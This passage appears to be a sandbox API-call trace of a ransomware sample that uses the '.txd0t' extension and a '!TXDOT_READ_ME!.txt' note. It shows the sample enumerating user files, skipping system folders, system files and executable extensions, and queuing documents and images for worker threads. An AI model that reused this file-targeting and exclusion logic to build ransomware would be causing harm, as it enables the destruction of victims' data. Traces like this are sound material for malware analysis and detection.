(lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system32\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.135] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\local\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\boot\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\perflogs\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\programdata\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\drivers\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\wsus\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="crypt_detect") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="cryptolocker") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="ransomware") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\WINDOWS") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.136] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files") returned 0x0 [0072.136] GetProcessHeap () returned 0xe30000 [0072.136] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xecf508 [0072.136] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\*") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\*" [0072.136] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe60e657f, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe60e657f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0072.136] StrCmpW (psz1=".", psz2=".") returned 0 [0072.136] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe60e657f, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe60e657f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.136] StrCmpW (psz1="..", psz2=".") returned 1 [0072.136] StrCmpW (psz1="..", psz2="..") returned 0 [0072.136] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddced0, ftCreationTime.dwHighDateTime=0x1d5e5d7, ftLastAccessTime.dwLowDateTime=0x2a0da5f0, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x2a0da5f0, ftLastWriteTime.dwHighDateTime=0x1d5edc7, nFileSizeHigh=0x0, nFileSizeLow=0x7688, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0R6G zd4i6nTDGa8VNm.png", cAlternateFileName="0R6GZD~1.PNG")) returned 1 [0072.136] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2=".") returned 1 [0072.136] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="..") returned 1 [0072.137] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="0R6G zd4i6nTDGa8VNm.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" [0072.137] PathFindExtensionW (pszPath="0R6G zd4i6nTDGa8VNm.png") returned=".png" [0072.137] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="bootsect.bak") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="iconcache.db") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="thumbs.db") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2=" ransomware ") returned 1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2=" ransom ") returned 1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="debug.txt") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="boot.ini") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="desktop.ini") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="autorun.inf") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="ntuser.dat") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="ntldr") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="ntdetect.com") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="bootfont.bin") returned -1 [0072.137] StrCmpIW (psz1="0R6G zd4i6nTDGa8VNm.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.137] PathFindExtensionW (pszPath="0R6G zd4i6nTDGa8VNm.png") returned=".png" [0072.137] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.137] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.137] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.137] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.137] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.137] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" [0072.137] SetEvent (hEvent=0x408) returned 1 [0072.137] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x486e5280, ftCreationTime.dwHighDateTime=0x1d5e57d, ftLastAccessTime.dwLowDateTime=0x52499ce0, ftLastAccessTime.dwHighDateTime=0x1d5e381, ftLastWriteTime.dwLowDateTime=0x52499ce0, ftLastWriteTime.dwHighDateTime=0x1d5e381, nFileSizeHigh=0x0, nFileSizeLow=0x11632, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3QaEJDzGG8TQ5z.rtf", cAlternateFileName="3QAEJD~1.RTF")) returned 1 [0072.137] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf", psz2=".") returned 1 [0072.137] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="..") returned 1 [0072.137] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="3QaEJDzGG8TQ5z.rtf", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" [0072.138] PathFindExtensionW (pszPath="3QaEJDzGG8TQ5z.rtf") returned=".rtf" [0072.138] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="bootsect.bak") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="iconcache.db") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="thumbs.db") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2=" ransomware ") returned 1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2=" ransom ") returned 1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="debug.txt") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="boot.ini") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="desktop.ini") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="autorun.inf") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="ntuser.dat") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="ntldr") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="ntdetect.com") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="bootfont.bin") returned -1 [0072.138] StrCmpIW (psz1="3QaEJDzGG8TQ5z.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.138] PathFindExtensionW (pszPath="3QaEJDzGG8TQ5z.rtf") returned=".rtf" [0072.138] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0072.138] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.138] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.138] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0072.138] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.138] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" [0072.138] SetEvent (hEvent=0x410) returned 1 [0072.138] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b42a0, ftCreationTime.dwHighDateTime=0x1d5ed72, ftLastAccessTime.dwLowDateTime=0xbc7247a0, ftLastAccessTime.dwHighDateTime=0x1d5ed6a, ftLastWriteTime.dwLowDateTime=0xbc7247a0, ftLastWriteTime.dwHighDateTime=0x1d5ed6a, nFileSizeHigh=0x0, nFileSizeLow=0xcb4d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5hVk52ujjP2vb7epC7.xls", cAlternateFileName="5HVK52~1.XLS")) returned 1 [0072.138] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls", psz2=".") returned 1 [0072.138] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="..") returned 1 [0072.138] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="5hVk52ujjP2vb7epC7.xls", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" [0072.139] PathFindExtensionW (pszPath="5hVk52ujjP2vb7epC7.xls") returned=".xls" [0072.139] StrCmpW (psz1=".xls", psz2=".txd0t") returned 1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="bootsect.bak") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="iconcache.db") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="thumbs.db") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2=" ransomware ") returned 1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2=" ransom ") returned 1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="debug.txt") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="boot.ini") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="desktop.ini") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="autorun.inf") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="ntuser.dat") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="ntldr") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="ntdetect.com") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="bootfont.bin") returned -1 [0072.139] StrCmpIW (psz1="5hVk52ujjP2vb7epC7.xls", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.139] PathFindExtensionW (pszPath="5hVk52ujjP2vb7epC7.xls") returned=".xls" [0072.139] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xls") returned 0x0 [0072.139] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.139] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.139] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.139] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.139] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls" [0072.139] SetEvent (hEvent=0x418) returned 1 [0072.139] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0605780, ftCreationTime.dwHighDateTime=0x1d5ed04, ftLastAccessTime.dwLowDateTime=0x3c594790, ftLastAccessTime.dwHighDateTime=0x1d5e4c2, ftLastWriteTime.dwLowDateTime=0x3c594790, ftLastWriteTime.dwHighDateTime=0x1d5e4c2, nFileSizeHigh=0x0, nFileSizeLow=0x233f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8zg7I2Esm.docx", cAlternateFileName="8ZG7I2~1.DOC")) returned 1 [0072.139] StrCmpW (psz1="8zg7I2Esm.docx", psz2=".") returned 1 [0072.139] StrCmpW (psz1="8zg7I2Esm.docx", psz2="..") returned 1 [0072.139] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.139] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="8zg7I2Esm.docx", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" [0072.140] PathFindExtensionW (pszPath="8zg7I2Esm.docx") returned=".docx" [0072.140] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="bootsect.bak") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="iconcache.db") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="thumbs.db") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2=" ransomware ") returned 1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2=" ransom ") returned 1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="debug.txt") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="boot.ini") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="desktop.ini") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="autorun.inf") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="ntuser.dat") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="ntldr") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="ntdetect.com") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="bootfont.bin") returned -1 [0072.140] StrCmpIW (psz1="8zg7I2Esm.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.140] PathFindExtensionW (pszPath="8zg7I2Esm.docx") returned=".docx" [0072.140] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0072.140] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.140] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.140] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.188] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.188] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx" [0072.188] SetEvent (hEvent=0x418) returned 1 [0072.189] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0072.189] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0072.189] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0072.189] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Adobe", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0072.189] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0072.189] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.189] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0072.189] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.189] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Adobe" [0072.189] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c41ba0, ftCreationTime.dwHighDateTime=0x1d5e0f5, ftLastAccessTime.dwLowDateTime=0x182069d0, ftLastAccessTime.dwHighDateTime=0x1d5e3b9, ftLastWriteTime.dwLowDateTime=0x182069d0, ftLastWriteTime.dwHighDateTime=0x1d5e3b9, nFileSizeHigh=0x0, nFileSizeLow=0x13a0b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNTcu_iQUI-LLKOyho.avi", cAlternateFileName="ANTCU_~1.AVI")) returned 1 [0072.189] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2=".") returned 1 [0072.189] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="..") returned 1 [0072.189] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.189] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="aNTcu_iQUI-LLKOyho.avi", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" [0072.189] PathFindExtensionW (pszPath="aNTcu_iQUI-LLKOyho.avi") returned=".avi" [0072.189] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="bootsect.bak") returned -1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="iconcache.db") returned -1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="thumbs.db") returned -1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2=" ransomware ") returned 1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2=" ransom ") returned 1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="debug.txt") returned -1 [0072.189] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", psz2="boot.ini") returned -1 [0072.190] StrCmpIW (psz1="aNTcu_iQUI-LLKOyho.avi", 